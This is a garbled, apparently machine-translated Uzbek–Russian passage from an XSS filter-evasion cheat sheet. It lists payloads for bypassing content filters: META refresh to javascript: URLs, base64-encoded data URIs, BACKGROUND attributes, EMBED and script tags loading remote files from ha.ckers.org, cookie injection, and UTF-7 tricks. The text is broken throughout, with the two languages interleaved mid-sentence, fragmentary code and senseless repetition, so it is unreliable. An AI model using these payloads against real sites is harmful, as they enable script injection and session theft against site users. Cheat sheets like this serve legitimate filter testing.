Стиль с использованием background va javascript protokoli yordamida uslublar:
¼script¾alert (¢xss¢) ¼ /
Используется script¾ noto'g'ri kodlash ishlatiladi . ASCII 7 o'rniga 8 bit bilan. Ushbu XSS может обойти ko'plab kontent filtrlarini chetlab o'tishi mumkin , ammo xost faqat передает в US-
ASCII kodlashiga o'tkazilsa ishlaydi
content="0;url=javascript:alert('XSS');">
Использование Teg foydalanish
tegidan foydalanib с атрибутом , http - equiv="refresh" atributi bilan позволяющим загрузить hujjatni по url в orqali joriy brauzer oynasiga yuklab olish imkonini beradi. В Bunday holda,
выполнить JavaScript
Использование Teg foydalanish
tegidan foydalanib с атрибутом , HTTP - equiv=" refresh " atributi bilan позволяющим загрузить , hujjatni по url в joriy brauzer oynasiga url orqali yuklab olish imkonini браузера beradi va qo'shimcha шифрование javascript base64-da javascript-ni shifrlash brauzerga tushunarli bo'lgan base64-da qo'shimcha javascript-ni shifrlash imkonini понятное brauzerga tushunarli, ammo не понятное xss
filtrlariga
agar filtr проверяет tegidagi URL xususiyatini tekshirsa, atrofga , uni chetlab можно boring bu
shunday bo'lishi mumkin.
Siz ularni topib va ushbu maqolaga qo'shib, loyihaga yordam berishingiz mumkin
Используется, если
"cookie" ("cookie") " > < / IFRAME
>
Используется, если
имеют такие же
BACKGROUND= " javascript-ni:alert ('XSS')">
Использование Teg foydalanish
для атаки foydalanuvchi uchunhujumпользователя
qilish uchun
< TD
BACKGROUND= " javascript:alert ('XSS') ">
hujum shuningdek подвержен атрибут , shuningdek, BACKGROUND y xususiyatiga ham ta'sir ko'rsatadi , elementda fon xususiyati ta'siriga
mahsulot ega
< DIV STYLE= "background-image"< bundan tashqari, Microsoft Word
- da, Microsoft Windows XP-da, Windows XP-da, Windows XP-da, Windows XP-da, Windows XP-da, Windows XP-da, Windows XP-da, iOS-da, iOS-da, iOS-da, iOS-da, iOS-da, iOS tasviri
bundan позволяет выполнить tashqari, javascript-ni bajarishga imkon beradi
Зашифрованный javascript в фоновом изображении элемента 29'\0029">ushbu
veb-saytida ko'rsatilgan barcha rasmlar, ularning egalari tomonidan mualliflik huquqi bor.')) ">
Fon tasviri
ortiqcha qo'shimcha belgilar
agar xizmat ob'ektlarni предоставляет возможность qo'shish imkoniyatini taqdim etsa, u таким holda можно вставить etsa, u holda JavaScript -ni qo'shishingiz mumkin
-ni embed
EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess= " har doim">
Использование Teg foydalanish
< EMBED>
SRC="data:image/svg+xml;base64,PHN2ZyB4bWx uczpzdmc9Imh0dH a6ly93d3cudzmub3jnlziwmdavc3zniib4bwxuc z0iaHR0cDovL3d3dy53My5vcmcv Mjawmc9zdmciihhtbg5zonhsaw5rpsjodhrwoi
tag
Ushbu in'ektsiya требует ishni talab qiladi server qismi yozilgan
php
SRC="da yozilgan server qismini ishlashni talabhttp://www.thesiteyouareon.com/somecomma qiladi http://www.thesiteyouareon.com/somecomma o'tish: saytda harakatlanish, qidiruvphp?somevariables=maliciouscode ">
Не является xss-инъекцией в haqiqiy ma'noda XSS in'ektsiyasi emas, balki выполнять действия vakolatlifoydalanuvchi nomidan harakatlarni amalga oshirishga imkon авторизованного
foydalanuvchi
beradi < META HTTP-EQUIV= "Set-Cookie" Content= " USERID = alert ('XSS') < /SCRIP T>">
С помощью Cookie-fayllar yordamida ham можно amalga oshirilishi mumkin oshirilishi mumkin вредоностного
zararli skriptni amalga oshirish.
agar ishlab chiquvchi kodlashni unutgan chiquvchi kodlashni unutgan bo'lsa, браузер, поддерживающий UTF-7-ni qo'llab-quvvatlaydigan har qanday brauzer skript
SRC="http://ha.ckers.org/xss.js">< / skript>
Работает на Saytlarda ishlaydi где
ruxsat ruxsat berilgan saytlarda ishlaydi, lekin не
В ko'pgina программ XSS filtrlash dasturlarida filtrlash
< skript src=> производится по muntazam ifoda bilan amalga
oshiriladi/?"|'(.)*?'|[^'">\s]+))?) + \s*/\s*) sr c / i
ushbu in'ektsiya muntazam ifoda sezmaydi заметит
hujjatni sezmaydi.ushbu maqolada boshqa til bo'limlariga ishorat yo'q.http://ha.ckers.org/xss.js"> < / skript >bunday>
Bunday XSS практически невозможно остановить, не блокируя barcha faol tarkibni blokirovka qilmasdan to'xtatish deyarli mumkin emas активное .